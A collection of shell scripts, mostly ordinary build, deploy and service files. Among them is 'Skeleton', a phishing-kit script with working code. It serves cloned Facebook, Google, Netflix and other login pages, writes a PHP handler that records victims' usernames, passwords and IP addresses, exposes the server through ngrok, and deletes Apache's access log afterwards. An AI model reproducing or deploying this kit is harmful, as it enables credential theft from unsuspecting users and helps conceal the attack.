url="https://www.html-tidy.org/"
license=(custom)
depends=(glibc)
makedepends=(cmake libxslt)
conflicts=(tidyhtml)
provides=(tidyhtml)
replaces=(tidyhtml)
source=("$pkgname-$_commit.tar.gz::https://github.com/htacg/tidy-html5/archive/$_commit.tar.gz")
sha512sums=('2854f81a4dcc5f0a995360b85a6169a4320a823e1982c12fba5fbe5d10afca442719e8a4ed719d038e7cf723a43523dc4294b2c751a29a8dfd5f471d96079767')
prepare() {
  # GitHub archives unpack as tidy-html5-<commit-sha>; rename to the
  # conventional <name>-<version> layout and create the out-of-tree
  # build directory.
  mv tidy-html5-{$_commit,$pkgver}
  mkdir -p build
}
build() {
  # Out-of-tree CMake release build, installing under /usr.
  cd build
  cmake ../tidy-html5-$pkgver \
    -DCMAKE_INSTALL_PREFIX=/usr \
    -DCMAKE_BUILD_TYPE=Release
  make
}
package() {
  cd build
  make DESTDIR="$pkgdir" install
  # Compatibility symlinks until everything is ported
  ln -s tidybuffio.h "$pkgdir"/usr/include/buffio.h
  ln -s tidyplatform.h "$pkgdir"/usr/include/platform.h
  # The license text ships inside the source tree (license=custom).
  install -Dm644 "$srcdir"/$pkgname-html5-$pkgver/README/LICENSE.md "$pkgdir"/usr/share/licenses/$pkgname/LICENSE
}
| true |
a68f0bca08ba950cdabeacdc83821840455636f9 | Shell | bauglir/castle-base | /home/local/bin/execute-with-envfile | UTF-8 | 161 | 3.59375 | 4 | [] | no_license | #!/usr/bin/env sh
ENV_FILE=$1
if [ -e $ENV_FILE ]; then
shift
eval $(cat "$ENV_FILE") "$@"
else
echo "Unknown environment file '$ENV_FILE' specified"
fi
| true |
55fecefd7174685163f66022e310c3bea54060dc | Shell | DataTransparency/Podaon | /scripts/environment-variables.sh | UTF-8 | 5,165 | 2.953125 | 3 | [] | no_license | #!/bin/sh -xe
: "${ENVIRONMENT:?There must be a ENVIRONMENT environment variable set}"
: "${LOCATION:?There must be a LOCATION environment variable set}"
export TEAMID=TQYB6VJLUN
export PROVIDER=JamesWOOD1426797195
export GITHUB_REPO=classfitter
export GITHUB_OWNER=classfitter
export PRODUCT_NAME=Podaon
export PRODUCT_NAME_LOWER=podaon
export BUILD_SCHEME="ClassfitteriOS"
export UI_TEST_SCHEME="UITests"
export UNIT_TEST_SCHEME="UnitTests"
if [[ $LOCATION == "CI" ]]; then
export NODE_ENV=production
export PATH=/Users/buildservice/.rvm/gems/ruby-2.3.0/bin:/Users/buildservice/.rvm/gems/ruby-2.3.0@global/bin:/Users/buildservice/.rvm/rubies/ruby-2.3.0/bin:/Users/buildservice/.rvm/bin:/Users/buildservice/.nvm/versions/node/v6.5.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/go/bin
else
export WORKSPACE=$PWD
export NODE_ENV=development
export BUILD_URL=http://www.fakeurl.com
export BUILD_NUMBER=0
export GIT_COMMIT=efdbd257dd5aa178ebcdfc265db22997d781654e
fi
: "${WORKSPACE:?There must be a WORKSPACE environment variable set}"
echo "The WORKSPACE is ${WORKSPACE}"
export BIN_DIRECTORY="${WORKSPACE}/bin/${ENVIRONMENT}"
export ENVIRONMENT_DIRECTORY="${WORKSPACE}/env/${ENVIRONMENT}"
export XCODE_WORKSPACE_DIRECTORY_NAME="ClassfitteriOS"
export XCODE_WORKSPACE_DIRECTORY="${ENVIRONMENT_DIRECTORY}/${XCODE_WORKSPACE_DIRECTORY_NAME}"
export IOS_APP_DIRECTORY_NAME="ClassfitteriOS"
export IOS_APP_DIRECTORY="${XCODE_WORKSPACE_DIRECTORY}/${IOS_APP_DIRECTORY_NAME}"
export XCODE_WORKSPACE_FILE="${XCODE_WORKSPACE_DIRECTORY}/ClassfitteriOS.xcworkspace"
export XCODE_PROJECT_FILE="${XCODE_WORKSPACE_DIRECTORY}/ClassfitteriOS.xcodeproj"
export XCODE_PROJECT_FILE_PBXPROJ="${XCODE_PROJECT_FILE}/project.pbxproj"
if [[ ${ENVIRONMENT} == 'production' ]]; then
DISPLAY_NAME="${PRODUCT_NAME}"
else
DISPLAY_NAME="$(tr '[:lower:]' '[:upper:]' <<< ${ENVIRONMENT:0:1})${ENVIRONMENT:1}"
fi
export DISPLAY_NAME
export FIREBASE_DIRECTORY_NAME=Firebase
export FIREBASE_SERVICE_FILE=${XCODE_WORKSPACE_DIRECTORY}/FirebaseServiceAccount.json
export FIREBASE_ANALYTICS_FILE=${XCODE_WORKSPACE_DIRECTORY}/GoogleService-Info.plist
export FIREBASE_SYMBOL_SERVICE_JSON=~/${FIREBASE_DIRECTORY_NAME}/FirebaseServiceAccount-${ENVIRONMENT}.json
export FIREBASE_ANALYTICS_PLIST=~/${FIREBASE_DIRECTORY_NAME}/GoogleService-Info-${ENVIRONMENT}.plist
export VERSION_FILE="${BIN_DIRECTORY}/version.txt"
export FULL_VERSION_FILE="${BIN_DIRECTORY}/fullversion.txt"
if [[ ${LOCATION} == 'CI' ]] && [[ ${COMMAND} == 'deploy' ]] && [[ ${ENVIRONMENT} == 'production' ]]; then
echo "Using payload from GitHub"
: "${payload:?There must be a payload environment variable set}"
else
echo "Using dev payload"
export payload=`cat ${WORKSPACE}/scripts/deploymentPayload.json`
fi
export PAYLOAD_FILE="${BIN_DIRECTORY}/payload.json"
export GITHUB_STATUS_NAME="${COMMAND}_${ENVIRONMENT}"
export STATUS_FILE="${BIN_DIRECTORY}/status.txt"
export BUNDLE_IDENTIFIER_BASE="com.podaon.ios"
export BUNDLE_IDENTIFIER="${BUNDLE_IDENTIFIER_BASE}-${ENVIRONMENT}"
export VENDOR_ID=${BUNDLE_IDENTIFIER}
if [[ ${COMMAND} == 'deploy' ]] || [[ ${COMMAND} == 'export' ]] || [[ ${COMMAND} == 'archive' ]] || [[ ${COMMAND} == 'build' ]]; then
export COMPILE_TYPE=release
else
export COMPILE_TYPE=debug
fi
export PROVISIONING_PROFILE_NAME="${ENVIRONMENT}-${COMPILE_TYPE}"
echo "The BUNDLE_IDENTIFIER AND VENDOR_ID are ${BUNDLE_IDENTIFIER}"
echo "The PROVISIONING_PROFILE_NAME is ${PROVISIONING_PROFILE_NAME}"
if [[ ${ENVIRONMENT} == 'production' ]]; then
export APPLEID=1159838083
export GOOGLE_APP_ID=1:785675090007:ios:3cd6ed1bd536e6dd
fi
if [[ ${ENVIRONMENT} == 'beta' ]]; then
export APPLEID=1159838089
export GOOGLE_APP_ID=1:785675090007:ios:ee7283f955dd5540
fi
if [[ ${ENVIRONMENT} == 'development' ]]; then
export APPLEID=1159838102
export GOOGLE_APP_ID=1:142144125321:ios:d2cea722aa24f417
fi
if [[ ${ENVIRONMENT} == 'test' ]]; then
export APPLEID=1159838093
export GOOGLE_APP_ID=1:1071308776983:ios:01c2ebec2e00b55b
fi
export ARCHIVE_DIR="${BIN_DIRECTORY}/archive"
export ARCHIVE_FILE_NAME="ClassfitteriOS"
export EXPORT_DIR="${BIN_DIRECTORY}/export"
export EXPORT_CHECK_DIR="${BIN_DIRECTORY}/export_check"
export UPLOAD_DIR="${BIN_DIRECTORY}/upload"
export ITSMP_FILE=${UPLOAD_DIR}/mybundle.itmsp
export UPLOAD_CHECK_DIR="${BIN_DIRECTORY}/upload_check"
export COVERAGE_DIR="${BIN_DIRECTORY}/coverage"
export UNIT_TEST_RESULTS_FOLDER="${BIN_DIRECTORY}/test-unit-results"
export UI_TEST_RESULTS_FOLDER="${BIN_DIRECTORY}/test-ui-results"
export TEST_RESULTS_FILE="${BIN_DIRECTORY}/results.xml"
export OCUNIT2JUNIT_FOLDER="${WORKSPACE}/test-reports"
if [[ ${LOCATION} == 'CI' ]]; then
if [[ ${COMMAND} == 'test-ui' ]]; then
DESTINATION="platform=iOS Simulator,name=iPhone SE,OS=10.0"
else
DESTINATION="platform=iOS Simulator,name=iPhone 6,OS=10.0"
fi
else
if [[ ${COMMAND} == 'test-ui' ]]; then
DESTINATION="platform=iOS Simulator,name=iPhone 6s,OS=10.0"
else
DESTINATION="platform=iOS Simulator,name=iPhone 5,OS=10.0"
fi
fi
export DESTINATION
| true |
eb22d49baacabf469d576287bb4685b99f3dd05d | Shell | shadowofthedusk/Skeleton | /skeleton.sh | UTF-8 | 13,830 | 3.125 | 3 | [] | no_license | #!/bin/bash
# _______ __ __ __
# | _ | |--.-----| .-----| |_.-----.-----.
# | 1___| <| -__| | -__| _| _ | |
# |____ |__|__|_____|__|_____|____|_____|__|__|
# |: 1 |
# |_______|
#**** INFO ****
#
# Skeleton is a Social Engineering tool attack switcher
# Type: Phishing Tool
#
# Target: Facebook, Linkedin, Twitter, Pinterest, Google, Instagram, Microsoft, Netflix
#
# DISCLAMER: Program for educational purposes!!!
#
#**********************
#
# Name: Skeleton
# Version: 1.0 beta
# Dev: Shell
# Language: En
# Date: 08/14/2017
# Author: KURO-CODE
#
#**********************
#**********************
#
# Name: Skeleton
# Version: 1.1
# Dev: Shell
# Language: En
# Date: 03/28/2018
# Author: KURO-CODE
#
# -Attack Switcher BugFix
# -Exit (Revision)
# -BugFix
# -Check ROOT perm...
#
#**********************
#**********************
#
# Name: Skeleton
# Version: 1.2
# Dev: Shell
# Language: En
# Date: 10/28/2018
# Author: KURO-CODE
#
# + BugFix
#
# ~~~ Sites ~~~
#
# + Google
# + Instagram
# + Microsoft
# + Netflix
#
#**********************
#**** Skeleton version ****
VERSION="1.2"
#**** Screen size ****
resize -s 20 61 > /dev/null
#**** Check Root ****
function check_root_perm() {
clear
FLAG
user=$(whoami)
if [ "$user" = "root" ]; then
echo -e "
$W [$G""X$W]$GR...$G""Y$W""ou are $G""Root$W!"
sleep 1.2
RUN
else
echo -e "
$W [$R""X$W]$GR...$R""Y$W""ou are not $R""Root$W!
$G""U$W""se:$Y sudo ./skeleton.sh$EC"
sleep 1
echo -e "
$W [$R""X$W]$GR...$R""C$W""lose"
sleep 1
fi
}
#**** CONFIG ****
IMG_PATH="img"
TMP="/var/www/html"
SITE="site/$site/$lang/index.html"
SYSTM32="ngrok"
SYSTEM64="ngrok_64"
SKELEDIAL=" SkEleToN~OpTioN: "
#**** Color ****
CL="\033[0;7m"
W="\033[1;37m"
GR="\033[0;37m"
R="\033[1;31m"
G="\033[1;32m"
Y="\033[1;33m"
B="\033[1;34m"
M="\033[1;35m"
EC="\033[0m"
#**** Display ****
DISPLAY_LOG="-geometry 40x5+800+0"
DISPLAY_SERV="-geometry 80x10+600-300"
DISPLAY_KEY="-geometry 100x21+600-0"
#**** TOP MENU SELECT ****
MENU_main="$W~ Main Menu ~$EC"
MENU_info="$W~ I N F O ~"
MENU_skel="$W~ Skeleton menu ~"
MENU_skel1="$B""S$W""E$GR""le$W""CT"
MENU_skel2="Select an attack"
#~~~ START ~~~
function RUN {
Place="Run"
clear
FLAG
sleep 1
echo -e "\n $B ***********************************
*$B A$W automatic$M phishing$R server$B *
*$W By$B K$W""U$B""R$W""O-$B""C$W""O$B""D$B""E$G &$M Z$W""0$W""m$M""B$W""13$M""D$W""o$M""LL$G 2$W""0$R""17$B *
***********************************$EC
"
sleep 3
main
}
function main {
Place="MAIN"
clear
FLAG
echo
echo -e "\n $MENU_main
$B""o$W-----------------$B""o$W
| 1$W)$GR...$B""I$GR""n$W""f$GR""o$W |
| 2$W)$GR...$B""S$W""k$GR""e$W""le$GR""to$W""n |
|$R 0$W)$GR...$R""Exit$W |
$B""o$W-----------------$B""o$EC
"
read -p "$SKELEDIAL" opt
case $opt in
1) inf;;
2) select_attack;;
0) EXITMODE;;
*) echo -e "$CL$R[ERROR]$EC"; sleep 2; main;;
esac
}
#~~~~ Attack Selection ~~~~
function select_attack {
place="Sel_Attack"
clear
FLAG
echo
echo -e " ~ $W$MENU_skel2 ~
$B""o$W--------------------------------$B""o$W
| $W""1)$GR...$B""F$W""acebook 2)$GR...$B""L$W""inkedin |
| |
| $W""3)$GR...$B""T$W""witter 4)$GR...$B""P$W""interest |
| |
| $W""5)$GR...$B""G$W""oogle 6)$GR...$B""I$W""nstagram |
| |
| $W""7)$GR...$B""M$W""icrosoft 8)$GR...$B""N$W""etflix |
| |
| $R""0$W)$GR...$R""Exit $Y""9$W)$GR...$Y""Back$W |
$B""o$W--------------------------------$B""o$EC
"
read -p "$SKELEDIAL" site
case $site in
1)
site="facebook"
if [ ! -d "sites/facebook" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
2)
site="linkedin"
if [ ! -d "sites/linkedin" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
3)
site="twitter"
if [ ! -d "sites/twitter" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
4)
site="pinterest"
if [ ! -d "sites/pinterest" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
5)
site="google"
if [ ! -d "sites/google" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
6)
site="instagram"
if [ ! -d "sites/instagram" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
7)
site="microsoft"
if [ ! -d "sites/microsoft" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
8)
site="netflix"
if [ ! -d "sites/netflix" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
sleep 2
select_attack
else
lang
fi ;;
9) echo -e " [*]...Back" ; main ;;
0) EXITMODE ;;
*) echo -e "$CL$R[ERROR]$EC"; sleep 3; select_attack ;;
esac
}
#~~~~ Attack Language ~~~~
function lang {
Place="Lang"
clear
FLAG
echo -e "\n ~ Select language attack ~
$B""o$W-----------------$B""o$W
| 1$W)$GR...$G""English$W |
| 2$W)$GR...$G""French$W |
|$R 9$W)$GR...$R""Back$W |
$B""o$W-----------------$B""o$EC
"
read -p "$SKELEDIAL" opt_lang
case $opt_lang in
1)
SLang="en"
if [ ! -d "sites/$site/$SLang" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
echo -e "$site"
sleep 2
select_attack
else
clear
FLAG
echo -e "\n $W[$G*$W]$GR...$G$site$W"
sleep 0.5
echo -e " $W[$B""E$W""n]$GR...$B""E$W""nglish selected"
sleep 0.5
echo -e " [$G*$W]$GR...$Y""Copy files$EC"
CopyFiles
Script
sleep 3
set_serv
fi ;;
2)
SLang="fr"
if [ ! -d "sites/$site/$SLang" ]; then
echo -e " $W[$Y!$W]$GR...$R""N$W""ot Exist$EC"
echo -e "$site"
sleep 2
select_attack
else
clear
FLAG
echo -e "\n $W[$G*$W]$GR...$G$site$W"
sleep 0.5
echo -e " $W[$B""F$W""R]$GR...$B""F$W""rench selected"
sleep 0.5
echo -e " [$G*$W]$GR...$Y""Copy files$EC"
CopyFiles
Script
sleep 3
set_serv
fi ;;
9) echo -e "$W[$R*$W]$GR...$W""Back" ; sleep 2 ; main ;;
*) echo -e "$CL$R[ERROR]$EC"; sleep 3; lang ;;
esac
}
#~~~~ Script ~~~~
function Script() {
echo "<?php
if (!empty(\$_SERVER['HTTP_CLIENT_IP']))
{
\$ipaddress = \$_SERVER['HTTP_CLIENT_IP'].\"\\r\\n\";
}
elseif (!empty(\$_SERVER['HTTP_X_FORWARDED_FOR']))
{
\$ipaddress = \$_SERVER['HTTP_X_FORWARDED_FOR'].\"\\r\\n\";
}
else
{
\$ipaddress = \$_SERVER['REMOTE_ADDR'].\"\\r\\n\";
}
\$useragent = \"User-Agent: \";
\$Username = \"Username: \";
\$PassWord = \"Password: \";
\$browser = \$_SERVER['HTTP_USER_AGENT'].\"\\r\\n\";
\$user = \$_POST['username'].\"\\r\\n\";
\$pass = \$_POST['password'].\"\\r\\n\";
\$CUT = \"-------------------------------\";
\$file = 'id.txt';
\$victim = \"\r\nIP: \";
\$fp = fopen(\$file, 'a');
fwrite(\$fp, \$victim);
fwrite(\$fp, \$ipaddress);
fwrite(\$fp, \$useragent);
fwrite(\$fp, \$browser);
fwrite(\$fp, \$Username);
fwrite(\$fp, \$user);
fwrite(\$fp, \$PassWord);
fwrite(\$fp, \$pass);
fwrite(\$fp, \$CUT);
fclose(\$fp);
header('Location: https://$site.com/');
exit();
" > $TMP/login.php
echo "<?php
include 'id.php';
header('Location: index.html');
exit
?> " > $TMP/index.php
}
#~~~~ Copy Files ~~~~
function CopyFiles() {
cp -r sites/$site/$SLang/* $TMP/
}
#~~~~ Set Server ~~~~
function set_serv {
Place="Set_Serv"
echo "#!/bin/bash
function rep {
clear
echo -e \"
$W~ Key ~$EC
\"
sleep 1
for i in \"$TMP/id.txt\"
do
echo -e \"****************
$site
****************\"
cat $TMP/id.txt
done
sleep 3
rep
}
rep" > key.sh
chmod +x key.sh
chmod 777 /var/www/html
service apache2 start
sleep 1
clear
FLAG
echo -e "
$W~ S$GR""e$W""T sE$GR""r$W""Ve$GR""r$W ~
$B""o$W------------$B""o$W
|$B 1$W)$GR...$B""3$W""2B$GR""it$W |
|$M 2$W)$GR...$M""6$W""4b$GR""i$W""T |
|$Y 3$W)$GR...$G""N$W""E$GR""x$W""T |
$B""o$W------------$B""o$W
[$Y""i$W] Server is active? Yes do \"next\" or select your system [$Y""i$W]
"
read -p "$SKELEDIAL" setserv
xterm -title "Skeleton Control" $DISPLAY_LOG -bg "#000000" -fg "#11ff00" -e "tail -f $TMP/id.txt > sk_tmp.csv" &
xterm -title "Skeleton" $DISPLAY_KEY -e "./key.sh" &
if [ "$setserv" -eq "1" ]; then
Sys="$SYSTM32"
echo -e "$W[$R+$W] Start service 32bit..."
sleep 2
chmod +x $SYSTM32
xterm -title "Skeleton Server Log" $DISPLAY_SERV -e ./$SYSTM32 http 80 &
sleep 2
control
elif [ "$setserv" -eq "2" ]; then
Sys="$SYSTEM64"
echo -e "$W[$R+$W] Start service 64bit..."
sleep 2
chmod +x $SYSTEM64
xterm -title "Skeleton Server Log" $DISPLAY_SERV -e ./$SYSTEM64 http 80 &
sleep 2
control
xterm -title "Skeleton Key" $DISPLAY_KEY -e "./key.sh" &
set_serv
elif [ "$setserv" -eq "3" ]; then
control
else
echo -e "$CL$R[ERROR]$EC"
sleep 2
set_serv
fi
}
#~~~~ Control Menu ~~~~
function control {
Place="Control"
clear
FLAG
echo -e "\n ~ Control attack switcher~
$B""o$W----------------------------$B""o$W
|$B 1$W)$GR...$W""Stop attack |
|$B 2$W)$GR...$W""Select another attack |
|$B 3$W)$GR...$W""Back to main menu |
|$R 0$W)$GR...$R""Exit$W |
$B""o$W----------------------------$B""o$EC
"
read -p "$SKELEDIAL" opt
case $opt in
1) report; Kill_Process; Kill_Services; Clean_TMP; main;;
2) report; Kill_Another; Clean_TMP; Kill_Services; select_attack;;
3) report; Kill_Process; Kill_Services; Clean_TMP; main;;
0) Kill_Process; Clean_TMP; Kill_Services; EXITMODE;;
*) echo -e "$CL$R[ERROR]$EC"; sleep 2; control;;
esac
}
#~~~~ INFO ~~~~
function inf {
Place="Info_Menu"
clear
FLAG
echo
echo -e " $MENU_info
$B""o$W------------------------$B+
$W|$CL$G Name:....Skeleton $EC$W|
$W|$CL$G Dev:.....Shell $EC$W|
$W|$CL$G Ver:.....$VERSION $EC$W|
$W|$CL$G Date:....10/28/2018 $EC$W|
$W|$CL$G Coder:...Kuro-code $EC$W|
$W|$CL$G Info:....Phishing tool $EC$W|
$B""o$W------------------------$B""o$W
[$M!$W] Special thanks: Z0mB13Do77 [$M!$W]
[$Y¡$W] Press$Y Enter$W, return main menu [$Y¡$W]$EC "
read pause
main
}
#~~~~ Report ~~~~
function report {
  # Persist the captured credentials to <site>.txt before the attack is
  # torn down.  Called by the control menu before stopping/switching.
  Place="report"   # Bug fix: missing '=' executed a command named 'Place'
  clear
  FLAG
  echo -e "
 $W[$R*$W]$GR...$W""Stop attack$GR...$W[$R*$W]"
  RPRT=$(cat $TMP/id.txt)
  Date=$(date +%D)
  echo -e "\n ~ $site Phishing Session ~
****************************************
$Date
$RPRT
===============================
SkEleToN 1.2
===============================
" > $site.txt
}
#~~~~ Exit ~~~~
function EXITMODE {
clear
FLAG
echo
echo -e "\n $CL Thanks for use Skeleton $EC"
sleep 2.5
clear
exit
}
#~~~~ Function Kill ~~~~
function Kill_Services() {
echo -e "\n$W[$R+$W]$GR Close services."
sleep 0.1
echo -e "\n$W[$R+$W]$GR Shutdow Apache."
service apache2 stop
chmod 700 /var/www/html
sleep 1
}
function Kill_Another() {
echo -e "\n$W[$R+$W]$GR Kill process... "
pkill key.sh
sleep 0.2
pkill tail
sleep 1
}
function Kill_Process() {
echo -e "\n$W[$R+$W]$GR Kill process... "
pkill key.sh
sleep 0.2
pkill $Sys
sleep 0.2
pkill tail
sleep 1
}
#~~~~ CLEAN TMP ~~~~
function Clean_TMP() {
  # Remove all artifacts of an attack session: the cloned phishing site in
  # the web root ($TMP), Apache's access log, the key-watcher helper script
  # and the temporary CSV capture.
  # NOTE(review): 'rm -rf $TMP/*' wipes /var/www/html unconditionally;
  # guard against an empty/unset $TMP before reusing this helper.
  echo -e "\n$W[$G+$W]$GR Clean temporary files"
  rm -rf $TMP/*
  sleep 0.2
  rm -f /var/log/apache2/access.log
  sleep 0.2
  rm -f key.sh
  sleep 0.2
  rm -f *.csv
  sleep 0.2
}
#~~~~ FLAG ~~~~
function FLAG {
echo -e "$B _______$W __ __ __
$B| _ |$W |--.-----| .-----| |_.-----.-----.
$B| 1___|$W <| -__| | -__| _| _ | |
$B|____ |$W""__|__|_____|__|_____|____|_____|__|__|
$B|: 1 |
$B|_______| $W""Social engineering tool$GE v$VERSION$EC "
}
#~~~~ Hard Exit ~~~~
function cap_traps() {
case $Place in
"Run") clear; EXITMODE;;
"MAIN") clear; EXITMODE;;
"Sel_Attack") clear; FLAG; Clean_TMP; EXITMODE;;
"Info_Menu") clear; EXITMODE;;
"Lang") clear; FLAG; Clean_TMP; EXITMODE;;
"Set_Serv") clear; FLAG; Clean_TMP; EXITMODE;;
"Control") clear; FLAG; Kill_Process; Kill_Services; Clean_TMP; EXITMODE;;
esac
}
for x in SIGINT SIGHUP INT SIGTSTP; do
trap_cmd="trap \"cap_traps $x\" \"$x\""
eval "$trap_cmd"
done
#### START ####
check_root_perm
| true |
521ec2ad91f5b6fba7f8b4c78f6370c0d5924971 | Shell | chinaares/jnrpe | /jnrpe-debian/src/deb/init.d/jnrpe | UTF-8 | 2,031 | 3.59375 | 4 | [] | no_license | #!/bin/sh
### BEGIN INIT INFO
# Provides: jnrpe
# Required-Start: $start_dependencies
# Required-Stop: $stop_dependencies
# Default-Start: $w_start_levels
# Default-Stop: $w_stop_levels
# Short-Description: yajsw wrapper for jnrpe
# Description: Java Nagios Remote Plugin Executor
### END INIT INFO
# config: /etc/jnrpe/wrapper.conf
# pidfile: /run/wrapper.jnrpe.pid
# apppidfile: /run/wrapper.$JAVA.jnrpe.pid
#-----------------------------------------------------------------------------
# YAJSW sh script template. Suitable for starting and stopping
# wrapped daemon on POSIX platforms.
#-----------------------------------------------------------------------------
JAVA=/usr/bin/java
WRAPPER_CONF=/etc/jnrpe/wrapper.conf
WRAPPER_PATH=/usr/local/jnrpe/wrapper
status() {
	# Query the YAJSW wrapper (-q) for the state of the wrapped JVM.
	# The nested quotes collapse through 'eval' into one command line;
	# this only works while none of the configured paths contain spaces.
	eval ""$JAVA" "-Dwrapper.pidfile=/run/wrapper.jnrpe.pid" "-Dwrapper.service=true" "-Dwrapper.visible=false" "-Djna_tmpdir=$WRAPPER_PATH" "-jar" "$WRAPPER_PATH/wrapper.jar" "-qx" "$WRAPPER_CONF" > /dev/null 2>&1"
	if [ $? -eq 0 ]
	then
		# Bug fix: user-visible typo "runnning" -> "running" (both branches).
		echo "Service jnrpe is running"
	else
		echo "Service jnrpe is not running"
	fi
}
stopit() {
echo "Stopping jnrpe ..."
eval ""$JAVA" "-Dwrapper.pidfile=/run/wrapper.jnrpe.pid" "-Dwrapper.service=true" "-Dwrapper.visible=false" "-Djna_tmpdir=$WRAPPER_PATH" "-jar" "$WRAPPER_PATH/wrapper.jar" "-px" "$WRAPPER_CONF" > /dev/null 2>&1"
}
startit() {
echo "Starting jnrpe ..."
eval ""$JAVA" "-Dwrapper.pidfile=/run/wrapper.jnrpe.pid" "-Dwrapper.service=true" "-Dwrapper.visible=false" "-Djna_tmpdir=$WRAPPER_PATH" "-jar" "$WRAPPER_PATH/wrapper.jar" "-tx" "$WRAPPER_CONF" > /dev/null 2>&1"
}
case "$1" in
'start')
startit
;;
'stop')
stopit
;;
'restart')
stopit
startit
;;
'force-reload')
stopit
startit
;;
'status')
status
;;
*)
echo "Usage: $0 { start | stop | restart | status }"
exit 1
;;
esac
exit $? | true |
222fd537f76d72d6477964a990e5fe4da14fa133 | Shell | leobaiano/dotfiles | /bin/wp-plugin-deploy | UTF-8 | 1,984 | 3.5 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# WP Plugin Deploy
#
echo "-------------------------------------------"
echo " WORDPRESS PLUGIN RELEASER "
echo "-------------------------------------------"
read -p "VERSION: " VERSION
# Get the current plugin directory name.
# This need to match with the plugin slug.
PROJECT_NAME=${PWD##*/}
# Save the current path.
GIT_PATH=$PWD
# SVN repos.
SVN_REPOSITORIES_PATH=~/Projects/wordpress-plugins-svn
# Project SVN path.
SVN_PATH=$SVN_REPOSITORIES_PATH/$PROJECT_NAME
echo "Commiting and creating tag on Git"
git commit -am "Release "${VERSION}", see readme.txt for changelog."
git tag $VERSION
git push origin master --tags
# Update SVN.
cd $SVN_PATH
echo "Updating SVN"
svn update
# Send all files to SVN trunk excluding some dev files.
cd $GIT_PATH
rsync ./ $SVN_PATH/trunk/ --recursive --verbose --delete --delete-excluded \
--exclude=.codeclimate.yml \
--exclude=.coveralls.yml \
--exclude=.editorconfig \
--exclude=.git/ \
--exclude=.gitattributes \
--exclude=.github \
--exclude=.gitignore \
--exclude=.gitmodules \
--exclude=.jscrsrc \
--exclude=.jshintrc \
--exclude=.sass-cache \
--exclude=.scrutinizer.yml \
--exclude=.travis.yml \
--exclude=apigen.neon \
--exclude=apigen/ \
--exclude=CHANGELOG.txt \
--exclude=composer.json \
--exclude=composer.lock \
--exclude=CONTRIBUTING.md \
--exclude=Gruntfile.js \
--exclude=node_modules \
--exclude=package.json \
--exclude=phpcs.ruleset.xml \
--exclude=phpunit.xml \
--exclude=phpunit.xml.dist \
--exclude=README.md \
--exclude=tests/ \
--exclude=vendor
# Remove old files and add new files.
cd $SVN_PATH
svn st | grep ^! | awk '{print " --force "$2}' | xargs svn rm
svn add --force * --auto-props --parents --depth infinity -q
# Create tag in SVN.
svn copy trunk tags/${VERSION}
echo "Commiting to wp.org SVN repository"
# Commit it to wp.org.
svn commit -m "Release "${VERSION}", see readme.txt for changelog."
echo "WORDPRESS PLUGIN RELEASER DONE"
| true |
e045a0f92f14fe4d721989b340883331cfc103a2 | Shell | reece/reece-base | /archive/bin/hackftplog.ksh | UTF-8 | 1,533 | 3.53125 | 4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/perl -w
##
## $RCSfile: hackftplog.ksh,v $
## $Revision: 1.2 $
## $Date: 1995/09/27 23:40:03 $
##
## NAME
## hackftplog - replace pid with where,who for more descriptive ftp logging
##
## SYNOPSIS
## hackftplog file
## hackftplog < file
##
## DESCRIPTION
## ftp logs have the form
## date ftpd[pid]: ANONYMOUS FTP LOGIN FROM where.inthe.world, id=who
## date ftpd[pid]: action
## In order to figure out who did the action, you've gotta look back and find
## the matching pid from a login line. This script replaces the pids with
## the more informative where,who text.
##
## REQUIREMENTS
## perl
##
## AVAILABILITY
## New versions of this file may be obtained from
## http://dasher.wustl.edu/~reece/src/hackftplog
##
## @@banner@@
##
$DFE="A30 A20";	# pack template: 30-char fqdn field + 20-char email field
# Stream the log: remember each ftpd pid's origin (host, user) from its
# login line, then rewrite later "[pid]" markers as "[host,user]".
while (<>)
{
# Add anonymous ftp login to list by generating an associative array
# keyed to the pid.  There are two types of lines we're looking for:
# 1) Contain ANONYMOUS FTP LOGIN FROM ...
/ftpd\[([0-9]*)\]: ANONYMOUS FTP LOGIN FROM ([^,]*), id=(.*)/ && do
{
($pid,$fqdn,$email) = ($1,$2,$3);
$ftplog{$pid}=pack($DFE,$fqdn,$email);
};
# 2) connection from ... (no user id known yet, store empty email)
/ftpd\[([0-9]*)\]: connection from ([^,]*)/ && do
{
($pid,$fqdn,$email) = ($1,$2,'');
$ftplog{$pid}=pack($DFE,$fqdn,$email);
};
# if it's a ftp log message, replace the pid with the where,who text
# NOTE(review): if a pid was never seen in a login line, $ftplog{$pid}
# is undef and unpack emits a -w warning -- confirm whether logs can
# start mid-session before relying on clean stderr.
/ftpd\[([0-9]*)\]:/ && do
{
$pid=$1;
($fqdn,$email)=unpack($DFE,$ftplog{$pid});
s/ftpd\[$pid\]/[$fqdn,$email]/;
};
print $_;
}
| true |
5122e24127f713424f4f410398cd84b23f8e2477 | Shell | gentoo-perl/gentoo-perl-helpers | /t/core-functions/dorun.t.sh | UTF-8 | 525 | 3.015625 | 3 | [] | no_license | source lib/core-functions.sh || exit 1
echo "====[ dorun test ]===="
function softspot() {
[[ ${cmdname} == 'softspot' ]] || die "FAIL: cmdname is not softspot"
einfo "Command name is ${cmdname}, FULL_COMMAND=${FULL_COMMAND}"
}
function deepspot() {
[[ ${cmdname} == 'deepspot' ]] || die "FAIL: cmdname is not deepspot"
einfo "Command name is ${cmdname}, FULL_COMMAND=${FULL_COMMAND}"
dorun softspot
